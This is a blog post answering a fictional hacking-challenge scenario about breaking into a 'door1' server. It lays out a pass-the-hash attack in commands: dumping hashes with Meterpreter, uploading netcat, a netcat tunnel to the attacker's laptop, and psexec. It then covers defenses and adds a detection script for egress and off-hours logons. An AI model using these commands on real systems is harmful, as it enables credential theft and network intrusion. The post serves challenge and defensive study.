All opinions expressed on this blog are my own and do not reflect those of BIET Jhansi students and employees, staff, or any official whatsoever, colleagues, family or friends. I express my opinions as a free citizen of a democracy exercising my Fundamental Right of speech. The intention of this blog is merely to air my views and opinions (and sometimes, frustration) and is not intended to insult, instigate, disgrace or hurt anyone (body, organisation or institution). Anyone is free to disagree with any or all of my views and can express them here or elsewhere. Any civil dialogue that is not unreasonably hurtful is welcome. I, however, reserve the right to delete any comment without any reason or warning. No content of this blog will in any way be a violation UNDER IPC Sections 506 and 295A. Legal issues, if any, will be restricted to the MEERUT jurisdiction only. This blog/web space is in the process of being copyrighted to safeguard my interests; erstwhile this be considered to be under the Creative Commons commercial INDIA License. This space resorts to politically and ethically correct statements, complying with the spirit of blogging. This is an opinion medium, not a reporting medium and hence should not IN ANY CASE BE TAKEN AS A FUNCTION OF MAINSTREAM MEDIA. The blog complies with the NAAVI guidelines. Thank you, MANOJ SINGH RANA

Sunday, October 4, 2009

Ethical Hacker Challenge

Devise a step-by-step approach for gaining control of the door1 server so that Kris can execute the dooropen.exe command with the privileges of the jailmaster account. Describe each tool you would use and how you would use it at each step of your hack.

The basic plan is the following:

1. dump the password hashes from "jailmasterlaptop"
2. use "web1" to create a tunnel for an SMB connection to "door1"
3. use psexec + pshtoolkit to authenticate and run the executable

Now for the gory details:

- after compromising "jailmasterlaptop", we hopefully have a Meterpreter session. There type:

use priv
hashdump

(the first command might not be necessary, but it doesn't do any harm). Note the hashes for the Jail Master account.

- get a netcat binary onto web1, if there isn't one already (many *NIX systems come with it preinstalled). For example, you could do something like this using the command execution vulnerability:

on the laptop:

encode the netcat with base64: base64 -w0 /bin/nc

execute the following commands on "web1":

echo "The base64 encoded string"|base64 -d > /tmp/fb
chmod +x /tmp/fb

If we use the uploaded netcat, change all references from nc to /tmp/fb in the following text.

- now we are ready to create the tunnel. Since we are restricted to outgoing connections from "web1", we do the following:

on the laptop (as root):

while true; do nc -l -p 80 -c "nc -l -p 139"; done

on "web1" (through the command execution vulnerability):

while true; do nc door1 139 -c "nc laptop 80"; done

The while loop is there to give us some leeway if we don't manage to connect on the first try or get disconnected for some reason.

- Being connected, we now need the Pass The Hash toolkit (the pshtoolkit from the plan above). There is a slight problem here: on the laptop we might have a version of XP which isn't supported by iam.exe, and iam-alt.exe has a little bug (http://hexale.blogspot.com/2008/10/bug-in-iam-alt-makes-it-fail-completely.html). We have two options: fix the bug in the source as the blog post describes and hope that we have a compiler to rebuild it, or patch the binary by searching for 00x (inverted because of the little-endianness of Intel CPUs) with a hex editor (mcedit will do) and replacing it with \x00\x00\x00 (three zero bytes) :-)

The toolkit executables need to run from the SYSTEM account, so launch a shell with psexec that has SYSTEM account privileges:

psexec \\laptop -s c:\windows\system32\cmd.exe

Now inject the hash:

iam-alt.exe -h jailmaster:door1:thehashes:recoveredfromjailmasterlaptop

- Finally, use psexec to spawn a shell on door1 (proxied through the laptop and web1):

psexec \\laptop -u DOOR1\jailmaster c:\windows\system32\cmd.exe

Now that we (hopefully) have a shell on door1, search for the executable:

cd \
dir /s|find "dooropen"

3) Briefly finish this tale by describing how the Burgermeisters could detect the tactics you described in your answer to item 2, as well as how they could have defended against each step you described.

The weak link in the chain was the "web1" machine. They should have:

* made sure that the web application doesn't have known vulnerabilities :-)
* used something like mod_security to look for suspicious access patterns
* used something like SELinux to disallow things like executables being run from /tmp
* disallowed all outgoing connections from the server

Patching jailmasterlaptop would also have helped ;-)

Finally, a login restriction could have been placed on the jailmaster account on "door1", such that the account could not be used during non-working hours.
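As an added example (not part of the original post), the following Python script shows what the detection side of the points above could look like in practice: it flags new outbound connections from "web1" that are not on an allow list (the tunnel to door1's SMB port and the callback to the laptop's port 80 would both show up), and it flags jailmaster logons on "door1" that happen outside working hours or arrive from the web tier, which is where door1 would see the proxied SMB session coming from. The host names are the post's; the IP addresses, the sample log lines, the netfilter LOG rule, the 08:00 to 18:00 working-hours window and the logon records are constructed assumptions.

```python
# Added example, not part of the original post: defender-side checks for the
# two weak points the post names, outbound connections from "web1" and
# logons with the jailmaster account at the wrong time or from the wrong place.
# Host names come from the post; IP addresses, the log samples and the
# working-hours window are constructed assumptions.
import re
from datetime import datetime

# Constructed sample of netfilter LOG output, as produced by a rule such as
# "iptables -A OUTPUT -m state --state NEW -j LOG --log-prefix 'EGRESS '"
# on web1 (10.1.1.20, assumed). door1 is assumed to be 10.1.1.30 and the
# internal resolver 10.1.1.53; 203.0.113.7 stands in for the attacker's laptop.
FIREWALL_LOG = """\
Oct  4 22:13:01 web1 kernel: EGRESS IN= OUT=eth0 SRC=10.1.1.20 DST=10.1.1.30 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=12345 DF PROTO=TCP SPT=41234 DPT=139 WINDOW=5840 RES=0x00 SYN URGP=0
Oct  4 22:13:02 web1 kernel: EGRESS IN= OUT=eth0 SRC=10.1.1.20 DST=203.0.113.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=12346 DF PROTO=TCP SPT=41235 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
Oct  4 22:13:05 web1 kernel: EGRESS IN= OUT=eth0 SRC=10.1.1.20 DST=10.1.1.53 LEN=62 TOS=0x00 PREC=0x00 TTL=64 ID=12347 DF PROTO=UDP SPT=5353 DPT=53 LEN=42
"""

# The only outbound traffic a web server in this position needs (assumption):
# DNS to the internal resolver. Everything else is a finding.
ALLOWED_EGRESS = {("10.1.1.53", "UDP", "53")}

KV_RE = re.compile(r"\b([A-Z]+)=(\S*)")


def parse_egress_line(line):
    """Return the KEY=VALUE fields of one netfilter LOG line, or None if the
    line is not an EGRESS record. Adds a NEW flag: for TCP, SYN without ACK."""
    if "EGRESS" not in line:
        return None
    fields = dict(KV_RE.findall(line))
    # TCP flag names appear as bare tokens in LOG output.
    fields["NEW"] = (fields.get("PROTO") != "TCP"
                     or (re.search(r"\bSYN\b", line) is not None
                         and re.search(r"\bACK\b", line) is None))
    return fields


def suspicious_egress(log_text, allowed=ALLOWED_EGRESS):
    """New connection attempts leaving the web server that are not allow-listed."""
    findings = []
    for line in log_text.splitlines():
        f = parse_egress_line(line)
        if not f or not f["NEW"]:
            continue
        if (f["DST"], f["PROTO"], f["DPT"]) not in allowed:
            findings.append({"SRC": f["SRC"], "DST": f["DST"],
                             "PROTO": f["PROTO"], "DPT": f["DPT"]})
    return findings


# Constructed logon records for door1: (timestamp, account, logon type, source).
# Logon type 3 is a network (e.g. SMB) logon and type 2 an interactive one, in
# Windows security-log terms. The first record is what the tunnelled session
# from the post looks like from door1's side: an SMB logon sourced from web1.
LOGON_EVENTS = [
    ("2009-10-04 22:15:10", "jailmaster", 3, "10.1.1.20"),
    ("2009-10-05 09:02:33", "jailmaster", 2, "-"),
    ("2009-10-05 13:40:00", "jailmaster", 3, "10.1.1.40"),
]

WORK_HOURS = (8, 18)       # assumption: 08:00 to 18:00, Monday to Friday
WEB_TIER = {"10.1.1.20"}   # addresses that should never be a logon source for door1


def off_hours_logons(events, work_hours=WORK_HOURS):
    """Logons falling on a weekend or outside the working-hours window."""
    start, end = work_hours
    hits = []
    for ts, account, _logon_type, _source in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        if when.weekday() >= 5 or not (start <= when.hour < end):
            hits.append((ts, account))
    return hits


def logons_from_web_tier(events, web_tier=WEB_TIER):
    """Network logons whose source address belongs to the web tier."""
    return [(ts, account, source) for ts, account, logon_type, source in events
            if logon_type == 3 and source in web_tier]


if __name__ == "__main__":
    for f in suspicious_egress(FIREWALL_LOG):
        print("unexpected egress:", f)
    for h in off_hours_logons(LOGON_EVENTS):
        print("off-hours logon:", h)
    for h in logons_from_web_tier(LOGON_EVENTS):
        print("logon sourced from web tier:", h)
```

Run as-is, the script reports the two outbound connection attempts (door1:139 and the laptop's port 80), the Sunday-night jailmaster logon, and the same logon again because its source is web1. The egress check is the log-side counterpart of the "disallow all outgoing connections" item: with a default-deny OUTPUT policy the same LOG rule turns every line into a blocked attempt rather than an after-the-fact alert.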
